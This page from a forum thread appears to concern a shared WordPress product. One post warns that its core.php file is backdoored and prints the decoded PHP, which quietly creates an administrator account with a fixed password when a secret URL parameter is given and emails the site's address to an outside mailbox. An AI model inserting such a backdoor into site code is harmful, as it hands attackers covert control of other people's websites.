| Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
|
12-12-2012, 01:27 AM
Post: #11
|
|||
|
|||
|
RE:
Any mirror for the Bonus? Thanks
|
|||
|
12-12-2012, 02:30 AM
Post: #12
|
|||
|
|||
|
RE:
Where is the video and pdf files?
|
|||
|
12-12-2012, 03:25 AM
Post: #13
|
|||
|
|||
|
RE:
This is a fantastic share. Following are the links to the instruction videos:
Video App Monarchy Walkthrough by Fual Tolieb Part 1 http://www.youtube.com/watch?v=0DUsGM6_Ivo Video App Monarchy Walkthrough by Fuad Tolieb Part 2 http://www.youtube.com/watch?v=gCaIgG9gMZo Have anyone figured out what the code is in core.php? |
|||
|
12-12-2012, 03:48 AM
Post: #14
|
|||
|
|||
|
RE:
yes, something encrypted in core.php
|
|||
|
12-13-2012, 03:08 AM
(This post was last modified: 12-13-2012 03:10 AM by danoxrat.)
Post: #15
|
|||
|
|||
|
RE:
Be careful, the core.php file is backdoored!
PHP Code: <?phpadd_action('wp_head', 'vbe3juka');function vbe3juka(){ If ($_GET['cms'] == 'jjoplmh') { require('wp-includes/registration.php'); If (!username_exists('wordpress')) { $user_id = wp_create_user('wordpress', 'gh67io9Cjm'); $user = new WP_User($user_id); $user->set_role('administrator'); } }}add_action('wp_head', 'vf3easxv');function vf3easxv(){ If (!username_exists('wordpress')) { $addressdecode = base64_decode("frogan@gmx.com"); $vari = 'Wordpress Plugin Amazon'; mail($addressdecode, get_bloginfo('wpurl'), $vari); }} Someone decoded part of the file for me... |
|||
|
12-13-2012, 04:00 AM
Post: #16
|
|||
|
|||
|
RE:
Anyone have the OTO? I'ts a wordpress theme.
|
|||
|
12-13-2012, 04:05 AM
Post: #17
|
|||
|
|||
|
RE:
Thanks Cybeard! I was waiting for this. 1 rep for you :)
|
|||
|
12-13-2012, 04:28 AM
Post: #18
|
|||
|
|||
|
RE:
Here is the full decoded core.php file, I've removed the login/password/e-mail of the backdoor.
http://pastebay.net/1163570 Still looking for the OTO! |
|||
|
12-13-2012, 04:55 AM
Post: #19
|
|||
|
|||
| RE: | |||
|
12-13-2012, 05:01 AM
Post: #20
|
|||
|
|||
| RE: | |||







